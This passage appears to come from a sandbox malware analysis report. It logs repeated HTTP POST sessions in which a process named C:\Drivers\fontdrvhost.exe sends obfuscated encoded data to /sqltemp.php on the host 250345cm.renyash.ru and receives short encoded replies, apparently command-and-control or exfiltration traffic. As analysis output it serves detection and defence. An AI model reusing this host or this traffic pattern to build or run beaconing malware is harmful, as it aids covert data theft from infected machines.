                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvNL0BlVKKCJM9pd%2Ftnf9afiLrN5kjfdw5XUKXmNDIZ5yx4hAW7uyjcudBUyn6jTuKwUs4xhSsYbiKjtZlxVPFl%2BAS%2BjaflvR1uJy%2Bv8pR7HFGX2Eb5Xhl6NlNZxypMoUA5BXT6x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe1f6c428cc5-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4202&min_rtt=1988&rtt_var=5174&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=74100&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            69192.168.2.449833104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:56.655623913 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:57.011529922 CET1012OUTData Raw: 53 50 5f 51 54 59 54 5d 58 56 52 59 56 58 59 51 5b 5f 54 5f 55 59 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SP_QTYT]XVRYVXYQ[_T_UYP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X3!\"?.$>D/:)R - ?) (-<#7]*;5&/?U-&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:57.120121002 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:57.376836061 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:57 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmXsKjmTtDfsq7KxreZKvX2PLTLtHjiUIalvTQMMjV08j%2FMV544oXbajeh%2F8xAYOn8H88b2lv73EUdbzvhxW3f4npH4Za6%2BHRaWtv%2FFQMqoB0wXaw3CT0t%2BAPNfSOXd3QgpeYwyt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe24bc710f47-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3038&min_rtt=1752&rtt_var=3230&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=121202&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            70192.168.2.449839104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:57.493779898 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:57.839742899 CET1012OUTData Raw: 56 50 5f 5c 51 58 54 55 58 56 52 59 56 50 59 5f 5b 5e 54 5b 55 5f 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_\QXTUXVRYVPY_[^T[U_PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'Y)#1'-88!S .,())-+#++%'.&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:57.947257042 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:58.117566109 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:58 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPOPEx8kiQ2l4ukp75ACbKll46ZNpQqyxDb9s0deVMSZopmwZRqid9tBYyQghd%2FIQdTqNOF2S2D%2BIhkQu1UgDV2Wlq6KVp3lNckjhHXyouGhuGO2S8gs9%2FCtCNTdcZPAdxes%2FrhV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe29ef2f4217-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3670&min_rtt=2244&rtt_var=3694&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=106928&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            71192.168.2.449845104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:58.246815920 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:58.605243921 CET1012OUTData Raw: 53 57 5a 51 51 5d 54 51 58 56 52 59 56 5d 59 50 5b 5b 54 5a 55 5f 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SWZQQ]TQXVRYV]YP[[TZU_P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/X /^0+B8:- =?U)>#!27(]=2'R:&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:52:58.694487095 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:58.954049110 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:58 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCw5dvl6QFOHhXabPq%2BGlLyNx8SzPLcKqcQpKxUNLKAIT6rGpwFwUuCqWa%2FoPQzFlsNis2dlumibl0iLoE8NA5DFw4GFW9ige%2FhgnrnRiX1UoBvxd9I4dTkV4Y2CtiZrPBlXxXQv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe2e88830c9e-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2124&min_rtt=1658&rtt_var=1555&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=270821&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            72192.168.2.449855104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:59.117568016 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:59.502351046 CET1012OUTData Raw: 53 50 5f 5d 51 5d 54 53 58 56 52 59 56 58 59 51 5b 5f 54 50 55 5c 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SP_]Q]TSXVRYVXYQ[_TPU\PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3?.4%Y'.'.*)R -8^<94*>?4!4<6&,(.:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:59.590369940 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            73192.168.2.449857104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:59.675390005 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1836
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:00.027266979 CET1836OUTData Raw: 53 55 5a 54 51 5a 51 57 58 56 52 59 56 59 59 52 5b 58 54 58 55 5d 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SUZTQZQWXVRYVYYR[XTXU]PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$/ "%.'.9.!=8_*9 )\ 0<>%Y'-:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:00.119092941 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:00.283760071 CET949INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:00 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HLA1MyMLuQYSsQcrLeI6Bi5ss1QczFRjA0t4ZdFCUxzx9YugkYRNVf%2FFOCGRUJ3XuNqBqd2rhIBnp0Mfbqu5Z3bPNKVgfskP0VVlK7BbrjjU0zlKvnVvqGbMW0IXfNMl4WBmUiRN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe377a2f42ad-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1624&rtt_var=636&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2155&delivery_rate=841983&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 54 3d 3e 2d 08 26 21 28 59 28 13 33 57 31 58 32 5b 29 3b 2a 1a 24 10 24 05 29 5f 3f 13 21 3c 08 01 31 01 20 12 37 13 33 58 30 34 2b 59 05 1c 20 0b 36 01 2f 00 3d 3d 30 07 26 01 03 5a 33 3e 0e 5f 3f 3b 30 1e 22 2b 20 00 27 2d 38 58 3e 04 02 55 26 2c 34 02 2e 2f 0c 0b 30 00 2c 54 00 11 26 57 27 0f 3b 00 37 09 3f 03 35 22 3d 1d 26 42 3e 56 26 3c 3b 53 23 00 26 16 26 32 2b 10 36 0d 21 02 26 2b 0b 58 23 04 33 1a 29 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%T=>-&!(Y(3W1X2[);*$$)_?!<1 73X04+Y 6/==0&Z3>_?;0"+ '-8X>U&,4./0,T&W';7?5"=&B>V&<;S#&&2+6!&+X#3)%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            74192.168.2.449858104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:59.795131922 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:00.152175903 CET1012OUTData Raw: 56 51 5f 56 54 58 51 56 58 56 52 59 56 5b 59 52 5b 58 54 5b 55 5c 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_VTXQVXVRYV[YR[XT[U\P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X3,&4_$@/%V#-(*8(.7 T#\<)E%,#V-*&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:00.242429018 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:00.417859077 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:00 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kGA2yTJB2sVfXlq1dUznFxUW%2Fo3QUxEfGl0eRcUnFqRPZO3wzocAxd7AdLmyZF76AnbwXvmT6VwHaPxYNdVSFzf4NskiRWtVmc1F6%2FrdC4KErYYes2Bc1teVimmigVtVG27EUvc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe383c3541df-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2136&min_rtt=1854&rtt_var=1261&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=354627&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            75192.168.2.449864104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:00.545312881 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:00.902198076 CET1012OUTData Raw: 56 51 5f 51 51 5c 51 50 58 56 52 59 56 5e 59 50 5b 59 54 51 55 58 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_QQ\QPXVRYV^YP[YTQUXPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'/49_'>?E,)!W >0Y+9)8 27X+]61<;T:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:01.042879105 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:01.250606060 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:01 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b0NB%2FDU2Ibj8SnEuObK3piZGsO46NvW3bCOU%2FXYec6u5%2F34RYzWzdgCZrXPjr9nzcFhWBvD2gKkd0dtIO60dbukloouhtpqVompcGpBAPQORUh7C%2BiMreh4LE4Wi5hg8AHH1J4io"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe3d2b278c3c-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4470&min_rtt=1985&rtt_var=5714&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=66770&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            76192.168.2.449871104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:01.373091936 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:01.730480909 CET1012OUTData Raw: 56 52 5f 54 54 50 54 52 58 56 52 59 56 5e 59 5f 5b 5e 54 51 55 59 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VR_TTPTRXVRYV^Y_[^TQUYPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y0<: Y-]$X4;*9!>,Z? (=777Z*;C%<?S-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:01.869383097 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:02.200321913 CET812INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:02 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cwsi%2FIU82eI%2FO1GP2xGG0VLEcl6VtB6%2F0HEbJ%2FHpjEXpi3Kvv1kokqFHkQxR9dYonvHxFxj4fNPB3NrnWBnjmOy%2B20F%2BssKWu7OVN7HtKQDm%2Fgb1j35J7rFtZtG3DFo8RTajxsv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe425c2f0c86-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3760&min_rtt=1918&rtt_var=4403&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=87661&cwnd=108&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            77192.168.2.449879104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:02.522223949 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:02.870881081 CET1012OUTData Raw: 56 5e 5f 5d 54 5b 54 53 58 56 52 59 56 5f 59 50 5b 5c 54 50 55 5a 50 5e 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
